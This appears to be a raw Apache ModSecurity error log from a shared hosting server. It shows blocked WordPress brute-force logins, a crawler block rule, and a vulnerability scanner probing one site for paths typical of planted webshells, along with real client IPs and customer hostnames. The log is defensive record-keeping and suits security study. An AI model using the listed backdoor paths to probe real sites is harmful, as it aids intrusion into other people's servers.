[Tue May 26 19:40:20.172653 2026] [security2:error] [pid 70836:tid 71073] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpy-_FvbQ_BhqVMRWHDgAAAPA"]
[Tue May 26 19:40:20.907552 2026] [security2:error] [pid 70836:tid 71072] [client 147.53.127.82:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWpzO_FvbQ_BhqVMRWHOwAAAO8"], referer: https://anujtradingco.com
[Tue May 26 19:40:21.010961 2026] [security2:error] [pid 70836:tid 70943] [remote 157.20.215.193:38664] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 193.215.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpzO_FvbQ_BhqVMRWHOAAAtWo"]
[Tue May 26 19:40:21.459056 2026] [security2:error] [pid 70836:tid 71063] [client 114.119.150.92:58983] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "triviewsolutions.com"] [uri "/about-us.html"] [unique_id "ahWpze_FvbQ_BhqVMRWHUAAAAOY"], referer: http://triviewsolutions.com/index.html
[Tue May 26 19:40:21.616228 2026] [security2:error] [pid 70836:tid 70938] [remote 157.20.215.193:38664] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 193.215.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpze_FvbQ_BhqVMRWHWAAA5WU"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:40:22.450636 2026] [security2:error] [pid 70836:tid 70937] [remote 38.95.35.74:37470] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpzu_FvbQ_BhqVMRWHcAAAqWQ"]
[Tue May 26 19:40:22.636804 2026] [security2:error] [pid 70836:tid 70988] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpzu_FvbQ_BhqVMRWHbwAAAJs"]
[Tue May 26 19:40:22.681042 2026] [security2:error] [pid 70836:tid 70953] [remote 38.95.35.74:37470] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpzu_FvbQ_BhqVMRWHfQAA8XQ"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:40:24.781099 2026] [security2:error] [pid 70836:tid 71079] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWp0O_FvbQ_BhqVMRWHyAAAAPY"]
[Tue May 26 19:40:25.776780 2026] [security2:error] [pid 70836:tid 70995] [client 20.151.117.104:29248] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWp0e_FvbQ_BhqVMRWH8AAAAKI"]
[Tue May 26 19:40:25.776912 2026] [security2:error] [pid 70836:tid 70995] [client 20.151.117.104:29248] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWp0e_FvbQ_BhqVMRWH8AAAAKI"]
[Tue May 26 19:40:26.147167 2026] [security2:error] [pid 70836:tid 71084] [client 20.151.117.104:29305] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/admin.php"] [unique_id "ahWp0u_FvbQ_BhqVMRWIAQAAAPs"]
[Tue May 26 19:40:26.147290 2026] [security2:error] [pid 70836:tid 71084] [client 20.151.117.104:29305] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/admin.php"] [unique_id "ahWp0u_FvbQ_BhqVMRWIAQAAAPs"]
[Tue May 26 19:40:26.456793 2026] [security2:error] [pid 70836:tid 71045] [client 20.151.117.104:28552] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/inputs.php"] [unique_id "ahWp0u_FvbQ_BhqVMRWICAAAANQ"]
[Tue May 26 19:40:26.456881 2026] [security2:error] [pid 70836:tid 71045] [client 20.151.117.104:28552] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/inputs.php"] [unique_id "ahWp0u_FvbQ_BhqVMRWICAAAANQ"]
[Tue May 26 19:40:26.457384 2026] [security2:error] [pid 70836:tid 71061] [client 202.76.169.202:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWp0u_FvbQ_BhqVMRWH_QAAAOQ"]
[Tue May 26 19:40:26.867638 2026] [security2:error] [pid 70836:tid 70987] [client 20.151.117.104:30055] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/file.php"] [unique_id "ahWp0u_FvbQ_BhqVMRWIHQAAAJo"]
[Tue May 26 19:40:26.867755 2026] [security2:error] [pid 70836:tid 70987] [client 20.151.117.104:30055] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/file.php"] [unique_id "ahWp0u_FvbQ_BhqVMRWIHQAAAJo"]
[Tue May 26 19:40:27.125269 2026] [security2:error] [pid 70836:tid 71021] [client 173.239.240.47:23263] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 47.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lifestylemne.me"] [uri "/wp-login.php"] [unique_id "ahWp0u_FvbQ_BhqVMRWIHgAAALw"]
[Tue May 26 19:40:27.191753 2026] [security2:error] [pid 70836:tid 71013] [client 20.151.117.104:28181] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/ms-edit.php"] [unique_id "ahWp0-_FvbQ_BhqVMRWIIgAAALQ"]
[Tue May 26 19:40:27.191861 2026] [security2:error] [pid 70836:tid 71013] [client 20.151.117.104:28181] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/ms-edit.php"] [unique_id "ahWp0-_FvbQ_BhqVMRWIIgAAALQ"]
[Tue May 26 19:40:27.692161 2026] [security2:error] [pid 70836:tid 71081] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWp0-_FvbQ_BhqVMRWIKAAAAPg"]
[Tue May 26 19:40:27.807075 2026] [security2:error] [pid 70836:tid 71071] [client 20.151.117.104:30037] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/simple.php"] [unique_id "ahWp0-_FvbQ_BhqVMRWIOwAAAO4"]
[Tue May 26 19:40:27.807201 2026] [security2:error] [pid 70836:tid 71071] [client 20.151.117.104:30037] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/simple.php"] [unique_id "ahWp0-_FvbQ_BhqVMRWIOwAAAO4"]
[Tue May 26 19:40:28.241602 2026] [security2:error] [pid 70836:tid 71042] [client 20.151.117.104:28890] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/bgymj.php"] [unique_id "ahWp1O_FvbQ_BhqVMRWISQAAANE"]
[Tue May 26 19:40:28.241707 2026] [security2:error] [pid 70836:tid 71042] [client 20.151.117.104:28890] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/bgymj.php"] [unique_id "ahWp1O_FvbQ_BhqVMRWISQAAANE"]
[Tue May 26 19:40:28.715899 2026] [security2:error] [pid 70836:tid 70985] [client 20.151.117.104:30086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-content/plugins/twenty/login.php"] [unique_id "ahWp1O_FvbQ_BhqVMRWIWwAAAJg"]
[Tue May 26 19:40:28.715991 2026] [security2:error] [pid 70836:tid 70985] [client 20.151.117.104:30086] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/wp-content/plugins/twenty/login.php"] [unique_id "ahWp1O_FvbQ_BhqVMRWIWwAAAJg"]
[Tue May 26 19:40:29.187260 2026] [security2:error] [pid 70836:tid 70996] [client 20.151.117.104:29352] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/404.php"] [unique_id "ahWp1e_FvbQ_BhqVMRWIbAAAAKM"]
[Tue May 26 19:40:29.187372 2026] [security2:error] [pid 70836:tid 70996] [client 20.151.117.104:29352] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/404.php"] [unique_id "ahWp1e_FvbQ_BhqVMRWIbAAAAKM"]
[Tue May 26 19:40:29.465127 2026] [security2:error] [pid 70836:tid 71071] [client 20.151.117.104:29277] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/file3.php"] [unique_id "ahWp1e_FvbQ_BhqVMRWIcQAAAO4"]
[Tue May 26 19:40:29.465231 2026] [security2:error] [pid 70836:tid 71071] [client 20.151.117.104:29277] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/file3.php"] [unique_id "ahWp1e_FvbQ_BhqVMRWIcQAAAO4"]
[Tue May 26 19:40:29.940945 2026] [security2:error] [pid 70836:tid 71066] [client 20.151.117.104:30092] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-mail.php"] [unique_id "ahWp1e_FvbQ_BhqVMRWIhwAAAOk"]
[Tue May 26 19:40:29.941081 2026] [security2:error] [pid 70836:tid 71066] [client 20.151.117.104:30092] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/wp-mail.php"] [unique_id "ahWp1e_FvbQ_BhqVMRWIhwAAAOk"]
[Tue May 26 19:40:30.071945 2026] [security2:error] [pid 70836:tid 71046] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWp1e_FvbQ_BhqVMRWIegAAANU"]
[Tue May 26 19:40:30.410089 2026] [security2:error] [pid 70836:tid 71058] [client 20.151.117.104:30101] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/about.php"] [unique_id "ahWp1u_FvbQ_BhqVMRWIjwAAAOE"]
[Tue May 26 19:40:30.410230 2026] [security2:error] [pid 70836:tid 71058] [client 20.151.117.104:30101] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/about.php"] [unique_id "ahWp1u_FvbQ_BhqVMRWIjwAAAOE"]
[Tue May 26 19:40:31.186276 2026] [security2:error] [pid 70836:tid 70837] [remote 3.208.180.187:54782] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 187.180.208.3.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWp1-_FvbQ_BhqVMRWIrQAAoQA"]
[Tue May 26 19:40:31.215164 2026] [security2:error] [pid 70836:tid 71093] [client 20.151.117.104:29689] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp.php"] [unique_id "ahWp1-_FvbQ_BhqVMRWIrgAAAQQ"]
[Tue May 26 19:40:31.215255 2026] [security2:error] [pid 70836:tid 71093] [client 20.151.117.104:29689] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/wp.php"] [unique_id "ahWp1-_FvbQ_BhqVMRWIrgAAAQQ"]
[Tue May 26 19:40:31.561659 2026] [security2:error] [pid 70836:tid 71003] [client 20.151.117.104:28886] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/.dj/index.php"] [unique_id "ahWp1-_FvbQ_BhqVMRWIvgAAAKo"]
[Tue May 26 19:40:31.561771 2026] [security2:error] [pid 70836:tid 71003] [client 20.151.117.104:28886] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/.dj/index.php"] [unique_id "ahWp1-_FvbQ_BhqVMRWIvgAAAKo"]
[Tue May 26 19:40:31.778986 2026] [security2:error] [pid 70836:tid 71026] [client 39.47.47.130:60642] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 130.47.47.39.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/xmlrpc.php"] [unique_id "ahWp1-_FvbQ_BhqVMRWIvwAAAME"]
[Tue May 26 19:40:31.779110 2026] [security2:error] [pid 70836:tid 71026] [client 39.47.47.130:60642] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "doyecpa.com"] [uri "/xmlrpc.php"] [unique_id "ahWp1-_FvbQ_BhqVMRWIvwAAAME"]
[Tue May 26 19:40:32.021067 2026] [security2:error] [pid 70836:tid 71034] [client 20.151.117.104:29288] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/adminfuns.php"] [unique_id "ahWp2O_FvbQ_BhqVMRWI0AAAAMk"]
[Tue May 26 19:40:32.021194 2026] [security2:error] [pid 70836:tid 71034] [client 20.151.117.104:29288] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/adminfuns.php"] [unique_id "ahWp2O_FvbQ_BhqVMRWI0AAAAMk"]
[Tue May 26 19:40:32.054310 2026] [autoindex:error] [pid 70836:tid 71007] [client 199.45.155.93:45508] AH01276: Cannot serve directory /home2/azurm42s/public_html/erptrn.azurmediatec.com/: No matching DirectoryIndex (index.php,index.html,index.htm) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:40:32.352484 2026] [security2:error] [pid 70836:tid 70992] [client 20.151.117.104:28193] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/php8.php"] [unique_id "ahWp2O_FvbQ_BhqVMRWI4gAAAJ8"]
[Tue May 26 19:40:32.352605 2026] [security2:error] [pid 70836:tid 70992] [client 20.151.117.104:28193] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/php8.php"] [unique_id "ahWp2O_FvbQ_BhqVMRWI4gAAAJ8"]
[Tue May 26 19:40:32.371845 2026] [security2:error] [pid 70836:tid 70972] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWp1-_FvbQ_BhqVMRWIyQAAAIs"]
[Tue May 26 19:40:32.797085 2026] [security2:error] [pid 70836:tid 71091] [client 20.151.117.104:29325] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/classwithtostring.php"] [unique_id "ahWp2O_FvbQ_BhqVMRWI7QAAAQI"]
[Tue May 26 19:40:32.797198 2026] [security2:error] [pid 70836:tid 71091] [client 20.151.117.104:29325] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/classwithtostring.php"] [unique_id "ahWp2O_FvbQ_BhqVMRWI7QAAAQI"]
[Tue May 26 19:40:32.986912 2026] [security2:error] [pid 70836:tid 70872] [remote 129.121.76.191:56370] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 191.76.121.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWp2O_FvbQ_BhqVMRWI7gAA-iM"]
[Tue May 26 19:40:33.270987 2026] [security2:error] [pid 70836:tid 71041] [client 20.151.117.104:28892] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/info.php"] [unique_id "ahWp2e_FvbQ_BhqVMRWI_gAAANA"]
[Tue May 26 19:40:33.271123 2026] [security2:error] [pid 70836:tid 71041] [client 20.151.117.104:28892] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/info.php"] [unique_id "ahWp2e_FvbQ_BhqVMRWI_gAAANA"]
[Tue May 26 19:40:33.300283 2026] [security2:error] [pid 70836:tid 70950] [remote 129.121.76.191:56370] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 191.76.121.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWp2e_FvbQ_BhqVMRWI_wAAmnE"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:40:33.922863 2026] [security2:error] [pid 70836:tid 71065] [client 20.151.117.104:29701] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/ioxi-o.php"] [unique_id "ahWp2e_FvbQ_BhqVMRWJEwAAAOg"]
[Tue May 26 19:40:33.923033 2026] [security2:error] [pid 70836:tid 71065] [client 20.151.117.104:29701] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/ioxi-o.php"] [unique_id "ahWp2e_FvbQ_BhqVMRWJEwAAAOg"]
[Tue May 26 19:40:34.560980 2026] [security2:error] [pid 70836:tid 71046] [client 20.151.117.104:29364] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/011i.php"] [unique_id "ahWp2u_FvbQ_BhqVMRWJKgAAANU"]
[Tue May 26 19:40:34.561072 2026] [security2:error] [pid 70836:tid 71046] [client 20.151.117.104:29364] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/011i.php"] [unique_id "ahWp2u_FvbQ_BhqVMRWJKgAAANU"]
[Tue May 26 19:40:35.111788 2026] [security2:error] [pid 70836:tid 71008] [client 20.151.117.104:30035] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/edit.php"] [unique_id "ahWp2-_FvbQ_BhqVMRWJQQAAAK8"]
[Tue May 26 19:40:35.111896 2026] [security2:error] [pid 70836:tid 71008] [client 20.151.117.104:30035] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/edit.php"] [unique_id "ahWp2-_FvbQ_BhqVMRWJQQAAAK8"]
[Tue May 26 19:40:35.344600 2026] [security2:error] [pid 70836:tid 70977] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWp2u_FvbQ_BhqVMRWJNgAAAJA"]
